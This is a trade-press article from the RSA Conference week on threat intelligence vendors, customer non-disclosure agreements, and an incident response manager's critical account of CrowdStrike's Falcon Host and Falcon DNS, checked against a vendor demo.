Threat Intelligence: The hot topic that makes people hesitant

SAN FRANCISCO – All this week, Salted Hash will be walking the halls of the RSA Conference in California. The running theme this week is threat intelligence; what it is and what it isn’t, the vendors who produce it, and the people who use it.

You’d think there would be an abundance of sources and source material given the topic, but that wasn’t the case at all.

For two weeks, Salted Hash attempted to locate security practitioners in various market segments to talk about threat intelligence, incident response, and how the two areas overlap. It wasn’t easy.

First, while most were willing to share their experiences, they wouldn’t or couldn’t share proof of those experiences, such as redacted screenshots of the product, or anything that would confirm they were a customer of a given vendor. It may seem extreme to require proof, but given the topic, we felt it was important to confirm first-hand knowledge of the product it possible, and avoid speculation.

Second, there was another segment of people willing to talk, but only in a general sense, because the threat intelligence vendor was holding non-disclosure agreements over their heads.

And that’s understandable. Most people aren’t allowed to talk to the media, and those who do often request that their name and employer be left out of the official record. But it’s strange that a threat intelligence vendor would have a non-disclosure agreement preventing a company from discussing perceived value or sharing information on the types of data they see.

We reached out to FireEye, one of the better-known and widely used threat intelligence vendors on the market, and asked if they used non-disclosure agreements to prevent customers from talking about the intelligence they get, its scope, or its value, etc.

A spokesperson got back to us a short time later, explaining that the intelligence products that they sell are proprietary “and customers agree in the terms and conditions not to disseminate the content beyond the organization (standard clause when purchasing content of any sort.) Talking about the scope, and perceived value, is certainly not prohibited.”

FireEye was one of the vendors where customers stated they couldn’t speak due to a non-disclosure agreement. As it turns out, FireEye customers are in fact free to talk about their experiences, they just can’t share content.

Perhaps the concept of what is and isn’t allowed with regard to open discussion isn’t being communicated properly by the vendor or the company. Then again, it could be a case where those in the trenches don’t know the limits of the non-disclosure agreements they cited when declining to talk. The final possibility as to why sourcing this week’s coverage was so taxing is that the organization just doesn’t want to discuss any aspect of their threat intelligence operations.

Maybe the entire notion of a vendor forcing non-disclosure agreements needs to be examined? Is it useful? Sure, keeping the sauce a secret has advantages, but how far is too far?

Rick Holland, when he was at Forrester (now the VP of Strategy for Digital Shadows), somewhat addressed this issue a report on threat intelligence last year:

One hundred percent transparency isn’t realistic; providers naturally want to protect their sources and methods, but they must find a compromise that informs prospects and demonstrates differentiation.

In a crowded market, providers who keep everything about sources and methods private will be hard-pressed to make customer shortlists where they will be given the opportunity to validate their nebulous claims. Challenge vendors that provide little detail and suggest nondisclosure agreements; as a last resort, eliminate them from consideration.

As mentioned, FireEye customers referenced non-disclosure agreements when asked specifics. Even after being informed that FireEye doesn’t prohibit discussions about perceived value or scope, they remained firm on their stance.

As you’ll see this week, we did find some people who use threat intelligence daily who were willing to share information, their experiences, and thoughts on the topic.

Those we spoke to use a number of different vendors and products to get the job done. Later this week, we’ll look at an advisory from Radware and examine context, discuss threat intelligence automation, learn what it takes to start a threat intelligence program, and more.

Today’s story looks at how an incident response manager uses CrowdStrike’s Falcon platform.

Full Disclosure: I have recently learned that CSO Online, the parent publication of Salted Hash, has an existing business relationship with CrowdStrike.

I was not aware of this business relationship prior to starting my research on threat intelligence. Editorial and marketing have defined limits and do not overlap when it comes to news gathering operations, so there was no way for me to know of it before hand. The existence of this business relationship was brought to my attention after my research into CrowdStrike came to an abrupt halt on February 23.

This abrupt halt was due to CrowdStrike contacting senior management at CSO Online. I don’t know the exact intent of the company in reaching out, but the contact with senior management alleged that I was refusing to give them a fair shake in what was shaping up to be a negative piece. This was confusing, because I had contacted the company twice in the previous week only to be met with silence.

Not only did I ask them to take part in the story on February 16; along with my questions, I informed them that I was speaking to a person working incident response in the finance sector, emailed them my story notes, the notes from a Falcon Host demo I watched, and informed them the demo notes would be part of the story, as they countered some of the source’s remarks.

I took these steps in order for them to have the ability to respond fully to the comments made by a customer. It was eight days before they returned with a brief statement on February 24, refusing to answer any of the questions asked. –Steve Ragan, Salted Hash

CrowdStrike’s statement is produced in full below. On page two of this post, you’ll find the interview with the source (incident response, finance) that their statement addresses.

“Without understanding who the customer is, and not understanding the role of this anonymous person, it is difficult to address any specifics of their implementation. Each customer has specific needs for their environment, which impacts how they implement and use our products.

“With a combination of Falcon Host, Falcon DNS and most importantly the data provided by Falcon Intelligence, we believe customers are in a position to dramatically reduce their exposure of a breach. We pride ourselves to provide value to our customers everyday, and we continue to add new capabilities to our products as evidenced by our winter platform release, announced this week.”

CrowdStrike’s press release on the aforementioned product can be found here. While it wouldn’t have stopped our research or reporting, Salted Hash was not aware of any pre-RSA Conference product releases from the company.

An incident response manager shares his experiences:

The image on the left is Falcon Host, the endpoint protection offering from threat intelligence vendor CrowdStrike.

The Falcon platform was launched by CrowdStrike during the 2013 RSA Conference. The image was shared with Salted Hash by a practitioner working in the finance sector – we’ll call him Jason.

According to CrowdStrike:

“Falcon Host provides real-time visibility into adversary activity on every endpoint – everything is captured, nothing is missed. The lightweight Falcon sensor immediately detects attacks and protects your data without having to rely on ‘sweeps and scans’ of the environment.”

Jason’s image shows the adversary part of the portal; an actor from China is highlighted (Samurai Panda). According to the write-up, nothing is known about this actor other than it targets organizations in Japan, and spear phishing is the likely delivery method of any malicious payloads. There are a few C2 domains listed, but that’s it.

When asked for details, Jason said the threat actor profiles don’t really relate to his organization. It’s frustrating at times he said, because a majority of the information on actors in the portal don’t pertain to financial threat actors he’s seen. It’s as if those actors are considered less important by CrowdStrike than nation state actors.

But the adversary portal isn’t a large part of his job; in fact he rarely needs to use it.

Just a typical day:

When an endpoint that’s being monitored by Falcon Host trips an alert, Jason gets an email, and thus his day begins.

The email contains a login link to the Falcon Host portal, as well as the hostname of the system that triggered the alert and a severity rating. Nothing more is offered, and no matter what the severity, the notice still arrives via email, so there’s no special alert for high-level events.

During a demo of Falcon Host, which Salted Hash registered for in order to verify Jason’s claims, it was confirmed during the Q&A section that email alerts could be somewhat customized and delivered to individuals or groups. There was no mention of special alerts for leveled events.

Often, he said, the alerts are useless – more false positives than anything. However, when a red team ran an engagement last year, Falcon Host did detect the red team’s actions, which was considered a win by the IR team. Otherwise, at least on his network, Falcon Host generates more noise than signal.

It was made clear during the Falcon Host demo that the product is there to stop hacking attempts. When tuned, it can detect a number of known methods and techniques, but it wasn’t clear from the demo how the unknowns are dealt with. Videos on YouTube about Falcon Host do address the topic, but Salted Hash can’t verify the rate of success.

The demo we witnessed used Metasploit and a basic attack technique (ASLR bypass). In addition, the domain used by the demo was we11point.com, a domain associated with a known actor that has been covered extensively by CrowdStrike and others. In all fairness, there was no way the demo could fail.

Tuning and blocking:

Falcon Host, Jason explained, is more of a host-based intrusion detection system (HIDS) than anything else, unless you enable a feature that will stop an attack.

This function however, isn’t activated in Jason’s environment due to fears that the automation it will break the business and kill processes that are legitimate. As it stands, Jason added, CrowdStrike’s Falcon platform is mostly a response tool, not threat intelligence.

During the demo, the automated blocking features were both enabled and disabled on Falcon Host. The same Metasploit-based attack was used each time. The known attack methods were detected without blocking enabled and alerts were raised.

However, the attack was still successful. When blocking was enabled, the known attack methods were halted and the demo attack was unsuccessful.

The image on the left shows the demo attack being detected. The redaction to the image was made by Salted Hash.

Based on the features shown during the demo, Jason’s comment that Falcon Host is a response tool and not threat intelligence is correct.

CrowdStrike collects their own threat intelligence (Falcon Intelligence) and uses it to drive the Falcon Platform.

One of the questions CrowdStrike didn’t answer when we reached out to them addressed how the company helped customers get past the hurdle of not trusting automated blocks and responses. It’s an important question considering it’s a key aspect of the platform.

Falcon DNS:

Another CrowdStrike offering, Falcon DNS, did detect bad traffic via malware to a C2. Once again though, Jason explained, much of that traffic is also noise by way of false positives, so one tends to get inured to the alerts.

Once in a blue moon, he said, Jason will get an email detailing domains that are likely being registered for squatting or phishing, and while that’s useful, those emails didn’t catch the other domains he discovered himself, so it’s hit or miss.

Play the hand you’re dealt:

Jason’s point, he later added, is that while CrowdStrike is considered a threat intelligence vendor, the intelligence their products provide to his organization is of little value. But it’s what they have, so they’ll take what they can get.

Again, considering what we learned during the demo, even if automated blocking isn’t enabled, Falcon Host will still spot most known attacks and raise the proper alerts. However, it was abundantly clear from the demo that Falcon Host’s power comes from its automation, which could be a problem if organizations don’t trust it.

Do you have a different experience with CrowdStrike? If so, feel free to comment below with your thoughts or email them.

The issue with false positives, too many alerts, and a lack of clear context will come up several times this week. It’s one of the largest sources of pain for practitioners working with threat intelligence feeds and platforms.